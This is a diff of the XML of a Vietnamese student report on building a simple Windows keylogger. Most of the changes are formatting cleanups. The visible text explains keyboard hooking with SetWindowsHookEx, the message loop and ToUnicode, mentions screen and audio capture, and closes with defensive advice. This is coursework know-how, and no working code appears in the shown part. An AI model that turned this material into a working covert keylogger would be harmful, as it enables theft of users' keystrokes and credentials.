           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>(hKeyHook</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>);</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>(hKeyHook);</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14944,18 +14031,8 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>0;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> 0;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -15089,43 +14166,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Trước tiên, ta khởi tạo một hàm </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>WinMain(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">). Hàm </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>WinMain(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>) có những tham số sau:</w:t>
+        <w:t>Trước tiên, ta khởi tạo một hàm WinMain(). Hàm WinMain() có những tham số sau:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15273,25 +14314,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">1 số nguyên để cung cấp cho hàm </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>ShowWindow(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>) (Không quan trọng).</w:t>
+        <w:t>1 số nguyên để cung cấp cho hàm ShowWindow() (Không quan trọng).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15310,25 +14333,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Trong hàm </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>WinMain(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>), ta khởi tạo một hook procedure vào một hook chain bằng hàm SetWindowsHookEx(). Hàm này có các đối số:</w:t>
+        <w:t>Trong hàm WinMain(), ta khởi tạo một hook procedure vào một hook chain bằng hàm SetWindowsHookEx(). Hàm này có các đối số:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15457,25 +14462,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Trong trường hợp này, dwThreadId trả về giá trị là 0, tham số này được đặt là </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>GetModuleHandle(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>NULL) trả về một handle cho tệp được sử dụng để tạo quá trình gọi.</w:t>
+        <w:t xml:space="preserve"> Trong trường hợp này, dwThreadId trả về giá trị là 0, tham số này được đặt là GetModuleHandle(NULL) trả về một handle cho tệp được sử dụng để tạo quá trình gọi.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15617,7 +14604,6 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -15625,16 +14611,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>GetMessage(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>) là hàm lấy thông tin từ message queue, khi tương tác với hệ thống, các tương tác được máy hiểu là các message và lưu vào một queue trong hệ thống, vòng lặp sẽ bắt các message này từ hệ thống.</w:t>
+        <w:t>GetMessage() là hàm lấy thông tin từ message queue, khi tương tác với hệ thống, các tương tác được máy hiểu là các message và lưu vào một queue trong hệ thống, vòng lặp sẽ bắt các message này từ hệ thống.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15647,23 +14624,13 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>TranslateMessage(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>) – Hàm này sẽ dịch message, hiểu đơn giản nếu ta gõ chữ thì chắc chắn ta sẽ gõ phím, việc dịch sẽ tương tự như vậy.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>TranslateMessage() – Hàm này sẽ dịch message, hiểu đơn giản nếu ta gõ chữ thì chắc chắn ta sẽ gõ phím, việc dịch sẽ tương tự như vậy.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15757,25 +14724,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Sau khi kết thúc, ta sử dụng hàm </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>UnhookWindowsHookEx(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>) để gỡ hook procedure ra khỏi hook chain được cài đặt bởi SetWindowsHookEx().</w:t>
+        <w:t>Sau khi kết thúc, ta sử dụng hàm UnhookWindowsHookEx() để gỡ hook procedure ra khỏi hook chain được cài đặt bởi SetWindowsHookEx().</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16041,25 +14990,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>- Hoàn thành nốt những phím đặc biệt như: F</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>1..</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>F12, Insert, PageUp, PageDown, NumLock, CapsLock,...</w:t>
+        <w:t>- Hoàn thành nốt những phím đặc biệt như: F1..F12, Insert, PageUp, PageDown, NumLock, CapsLock,...</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16144,18 +15075,8 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">- Ngoài việc ghi nhận phím người dùng nhập vào, nó có thể chụp màn hình, ghi âm những gì người dùng </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>nói,..</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>- Ngoài việc ghi nhận phím người dùng nhập vào, nó có thể chụp màn hình, ghi âm những gì người dùng nói,..</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16685,18 +15606,8 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>– Không mở các tập tin với phần mở rộng có thể liên quan đến mã độc như .bat, .com, .exe, .pif, .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>vbs,…</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>– Không mở các tập tin với phần mở rộng có thể liên quan đến mã độc như .bat, .com, .exe, .pif, .vbs,…</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -16715,18 +15626,8 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">– Không được tắt cơ chế kiểm soát an ninh mã độc như phần mềm diệt virus, phần mềm lọc nội dung, tường </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>lửa,…</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>– Không được tắt cơ chế kiểm soát an ninh mã độc như phần mềm diệt virus, phần mềm lọc nội dung, tường lửa,…</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18082,65 +16983,27 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>WinMain(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>),SetWindowsHookEx</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>(),</w:t>
+              <w:t>WinMain(),SetWindowsHookEx(),</w:t>
             </w:r>
           </w:p>
           <w:p>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>CallNextHookEx(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>),</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>CallNextHookEx(),</w:t>
             </w:r>
           </w:p>
           <w:p>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>UnhookWindowsHookEx(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>)</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>UnhookWindowsHookEx()</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -18192,23 +17055,13 @@
                 <w:szCs w:val="28"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>ToUnicode(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>)</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>ToUnicode()</w:t>
             </w:r>
           </w:p>
         </w:tc>

--- a/Báo cáo Project 1 tạo Keylogger đơn giản.docx
+++ b/Báo cáo Project 1 tạo Keylogger đơn giản.docx
@@ -1292,7 +1292,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="0" w:name="_Toc43674101"/>
-      <w:bookmarkStart w:id="1" w:name="_Toc57761752"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc60895341"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1446,7 +1446,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="2" w:name="_Toc43674102"/>
-      <w:bookmarkStart w:id="3" w:name="_Toc57761753"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc60895342"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1503,7 +1503,8 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
               <w:sz w:val="28"/>
               <w:szCs w:val="28"/>
@@ -1533,7 +1534,7 @@
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc57761752" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895341" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1541,7 +1542,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -1575,7 +1575,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761752 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895341 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1620,101 +1620,12 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
-            </w:tabs>
             <w:rPr>
-              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              <w:noProof/>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:sz w:val="28"/>
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761753" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>MỤC LỤC</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761753 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
         </w:p>
         <w:p>
           <w:pPr>
@@ -1726,12 +1637,11 @@
               <w:rStyle w:val="Hyperlink"/>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
-              <w:color w:val="auto"/>
               <w:sz w:val="28"/>
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761754" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895342" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1739,11 +1649,10 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>DANH MỤC HÌNH ẢNH</w:t>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>MỤC LỤC</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1773,7 +1682,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761754 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895342 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1802,7 +1711,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>2</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1816,7 +1725,15 @@
             </w:r>
           </w:hyperlink>
         </w:p>
-        <w:p/>
+        <w:p>
+          <w:pPr>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+        </w:p>
         <w:p>
           <w:pPr>
             <w:pStyle w:val="TOC1"/>
@@ -1824,13 +1741,14 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
               <w:sz w:val="28"/>
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761755" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895343" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1838,7 +1756,114 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>DANH MỤC HÌNH ẢNH</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895343 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+              <w:u w:val="single"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc60895344" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -1872,7 +1897,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761755 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895344 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1928,7 +1953,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
